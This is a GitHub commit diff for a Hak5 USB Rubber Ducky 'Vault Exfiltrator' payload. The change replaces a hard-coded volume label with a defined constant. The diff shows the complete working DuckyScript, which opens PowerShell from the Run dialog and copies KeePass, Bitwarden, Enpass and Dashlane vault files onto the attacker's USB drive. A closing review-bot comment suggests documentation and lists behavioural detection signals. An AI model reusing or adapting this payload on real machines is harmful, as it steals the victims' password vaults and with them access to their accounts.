Change label definition in Vault Exfiltrator payload

Daniel Miranda Barcelona
2026-01-31 03:17:44 +01:00
committed by GitHub
parent 51af366ec2
commit 7629c29742


@@ -7,12 +7,13 @@ REM Category: exfiltration
REM Props: Hak5 Community
ATTACKMODE HID STORAGE
DEFINE #LABEL DUCKY
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell
DELAY 500
STRINGLN $vol=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter
STRINGLN $vol=(Get-Volume -FileSystemLabel '#LABEL').DriveLetter
STRINGLN mkdir $vol':\'VAULTS\
STRINGLN dir "$env:USERPROFILE\Documents\*.kdbx" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
STRINGLN dir "$env:APPDATA\Bitwarden\data.json" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
@@ -22,4 +23,4 @@ STRINGLN dir "$env:APPDATA\Sinew Software Systems Pvt Ltd\Enpass\Enpass\Vaults\*
STRINGLN dir "$env:LOCALAPPDATA\Packages\SinewSoftwareSystems.EnpassPasswordManager_fwdy0m65qb6h2\LocalState\Vaults\*.enpassdb" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
STRINGLN dir "$env:APPDATA\Dashlane\*.dashlane" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
STRINGLN dir "$env:USERPROFILE\Documents\Enpass\*.enpassdb" -ErrorAction SilentlyContinue | copy -Destination $vol':\'VAULTS\ -Force
STRINGLN exit
STRINGLN exit
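Review bot: In the first hunk, the new `DEFINE #LABEL DUCKY` has no REM line explaining it, and with the label now a constant, the literal `'DUCKY'` stops being a stable indicator for this payload in PowerShell logs. A header comment such as `REM #LABEL is the storage volume label passed to Get-Volume -FileSystemLabel` would document the constant. For readers building detections from this page, the durable signals are behavioural: a PowerShell session opened from the Run dialog that resolves a drive letter with `Get-Volume -FileSystemLabel` and then copies `*.kdbx`, Bitwarden `data.json` and similar vault files to that drive. The lookup line appears twice because the page prints the old and new side without markers; the `'#LABEL'` form is presumably the new one.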